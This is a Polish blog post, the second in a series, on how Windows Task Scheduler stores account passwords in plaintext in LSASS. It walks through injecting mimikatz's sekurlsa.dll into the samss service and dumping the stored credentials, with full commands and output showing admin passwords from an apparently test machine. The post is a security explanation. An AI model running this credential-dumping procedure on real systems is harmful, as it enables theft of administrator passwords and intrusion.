Zine.net online

Witaj na Zine.net online Zaloguj się | Rejestracja | Pomoc
w Szukaj

mgrzeg.net - Admin on Rails :)

LogonUser & TaskEng, cz. 2

W części pierwszej wskazałem miejsce, w którym przechowywana jest para user/password, jednak wspomniałem, iż z kodu użytkownika nie ma za bardzo szans na wyciągnięcie jej, vide opis struktury CREDENTIAL:

"If the Type member is CRED_TYPE_DOMAIN_PASSWORD, this member contains the plaintext Unicode password for UserName. The CredentialBlob and CredentialBlobSize members do not include a trailing zero character. Also, for CRED_TYPE_DOMAIN_PASSWORD, this member can only be read by the authentication packages."

Jak widać, hasło jest _plaintext_, jednak aby się do niego dobrać, musimy skorzystać z kawałka kodu działającego w ramach LSASS, który wykona niedostępne dla nas CredIEnumerate (nieudokumentowana), CrediReadDomainCredentials, a wynikowe poświadczenia dodatkowo potraktuje LsaUnprotectMemory.

Z pomocą przychodzi nam tu świetny mimikatz Benjamina Delpy, a dokładniej biblioteka sekurlsa.dll. Uruchamiamy mimikatz (jako administrator):

>mimikatz.exe
mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Jan 23 2013 19:49:52) */
// http://blog.gentilkiwi.com/mimikatz

Ustawiamy sobie przywilej debugowania

mimikatz # privilege::debug
Demande d'ACTIVATION du privilcge : SeDebugPrivilege : OK

Wciskamy sekurlsa.dll do usługi samss

mimikatz # inject::service samss sekurlsa.dll
SERVICE(samss).serviceDisplayName = Security Accounts Manager
SERVICE(samss).ServiceStatusProcess.dwProcessId = 528
Attente de connexion du client...
Serveur connecté r un client !
Message du processus :
Bienvenue dans un processus distant
                        Gentil Kiwi

SekurLSA : librairie de manipulation des données de sécurités dans LSASS
[CIAP]

Odczytujemy poświadczenia z pamięci procesu lsass:

mimikatz # @getCredman full

[CIAP]
Authentification Id         : 0;999
Package d'authentification  : NTLM
Utilisateur principal       : VM7$
Domaine d'authentification  : WORKGROUP
        credman :
         * [0] Target   : Domain:batch=TaskScheduler:Task:{21E1C13A-0231-4FDB-BC
89-454F1F286F67} / <NULL>
         * [0] Comment  : <NULL>
         * [0] User     : VM7\admin3
               [0] User : VM7\admin3
               [0] Cred : Pa$$w0rd3

         * [1] Target   : Domain:batch=TaskScheduler:Task:{2A1D3112-9563-4856-80
C3-1EE6AAB76FC6} / <NULL>
         * [1] Comment  : <NULL>
         * [1] User     : VM7\admin2
               [0] User : VM7\admin2
               [0] Cred : Pa$$w0rd1

Nie przejmujcie się francuskim - ze względu na dużą popularność tego narzędzia Benjamin zdecydował się przejść na angielski i ostatnie (i przyszłe) wersje będą już w tym języku.

Opublikowane 12 kwietnia 2013 18:51 przez mgrzeg

Powiadamianie o komentarzach

Jeżeli chciałbyś otrzymywać email gdy ta wypowiedź zostanie zaktualizowana, to zarejestruj się tutaj

Subskrybuj komentarze za pomocą RSS

Komentarze:

Brak komentarzy

Co o tym myślisz?

(wymagane) 
(opcjonalne)
(wymagane) 

  
Wprowadź kod: (wymagane)
Wyślij

Subskrypcje

W oparciu o Community Server (Personal Edition), Telligent Systems